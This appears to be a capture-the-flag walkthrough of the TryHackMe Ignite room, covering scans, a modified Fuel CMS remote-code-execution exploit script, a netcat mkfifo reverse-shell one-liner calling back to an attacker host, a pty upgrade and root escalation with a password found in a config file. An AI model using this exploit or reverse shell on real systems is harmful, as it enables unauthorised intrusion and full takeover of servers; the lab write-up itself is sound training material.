The TryHackMe Ignite room is available at https://tryhackme.com/room/ignite
As always, the first thing to do is do an nmap scan of the server.
sudo nmap -sS -sV -vv -T4 x.x.x.x
- -sS for Syn/Stealth Scan
- -sV to find out version information
- -T4 for a fast aggressive scan
- -vv for very verbose to monitor the scan
And we get the following
- PORT STATE SERVICE REASON VERSION
- 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
Now that we know it’s a webserver, lets browse to the machine and see what we can find.
We know it is a webapp, so lets do a scan with dirb and see if we can find any hidden files or folders that could be useful.
dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt
Which gives us some directories but not much else
- —- Scanning URL: http://x.x.x.x/ —-
- + http://x.x.x.x/@ (CODE:400|SIZE:1134)
- + http://x.x.x.x/0 (CODE:200|SIZE:16595)
- ==> DIRECTORY: http://x.x.x.x/assets/
- + http://x.x.x.x/home (CODE:200|SIZE:16595)
- + http://x.x.x.x/index (CODE:200|SIZE:16595)
- + http://x.x.x.x/index.php (CODE:200|SIZE:16595)
- + http://x.x.x.x/lost+found (CODE:400|SIZE:1134)
- + http://x.x.x.x/offline (CODE:200|SIZE:70)
- + http://x.x.x.x/robots.txt (CODE:200|SIZE:30)
- + http://x.x.x.x/server-status (CODE:403|SIZE:300)
- —- Entering directory: http://x.x.x.x/assets/ —-
- + http://x.x.x.x/assets/@ (CODE:400|SIZE:1134)
- ==> DIRECTORY: http://x.x.x.x/assets/cache/
- ==> DIRECTORY: http://x.x.x.x/assets/css/
- ==> DIRECTORY: http://x.x.x.x/assets/docs/
- ==> DIRECTORY: http://x.x.x.x/assets/images/
- ==> DIRECTORY: http://x.x.x.x/assets/js/
- + http://x.x.x.x/assets/lost+found (CODE:400|SIZE:1134)
- ==> DIRECTORY: http://x.x.x.x/assets/pdf/
- ==> DIRECTORY: http://x.x.x.x/assets/swf/
However, using searchsploit, we do find that there some exploits available for Fuel CMS. For more information, have a look at the exploit-db page at https://www.exploit-db.com/exploits/47138
The local exploit file is available at /usr/share/exploitdb/exploits/linux/webapps. – Copy thee 47138.py file to your working folder.
The exploit needs some modification as the author was using burp as a proxy. Now you could use Burp as a proxy or you can just edit the code so it looks like the code below. Just remember to change the x.x.x.x to the correct IP of Ignite machine.
import requests import urllib URL = "http://x.x.x.x/" def find_nth_overlapping(haystack, needle, n): start = haystack.find(needle) while start >= 0 and n > 1: start = haystack.find(needle, start+1) n -= 1 return start while 1: xxxx = input('cmd:') url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" r = requests.get(url) html = "<!DOCTYPE html>" htmlcharset = r.text.find(html) begin = r.text[0:20] dup = find_nth_overlapping(r.text,begin,2) print(r.text[0:dup])
This will now give you a very limited shell. You can run any user commands you want, however, they will need to included in quotation marks like this
We can create a reverse listener to get a slightly more usable shell using netcat. Open another terminal on your machine and the following command
nc -nvlp 4444
This creates a netcat listener, waiting for a connection on port 4444.
Now, on Ignite box, run the command
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"
This will run a shell for netcat to connect your machine and the waiting netcat listener. For more information, visit the PentestMoney Reverse Cheat Sheet page at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Now you have a much better shell.
After running the whoami command, we see we are the user www-data. Check to see if you find any interesting files in the home directory for www-data.
Now it is time to get root. First we can check if we can run any commands from sudo
But we get an error message
However, the configuration page for the Fuel System says we can configure the database, maybe there are some useful details in it. Look through the /var/www/html sub folders for the configuration file.
And it does, it gives us the root login and password. Now we can just run the command
And it is not so easy, we get an error message.
su: must be run from a terminal
However, if we run the following command, can get a working terminal assuming the system has python installed.
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py
Now lets try use su again
And after using the root password we found in the configuration file, we are now root. A quick visit to /root/ to find the second flag and the machine is complete.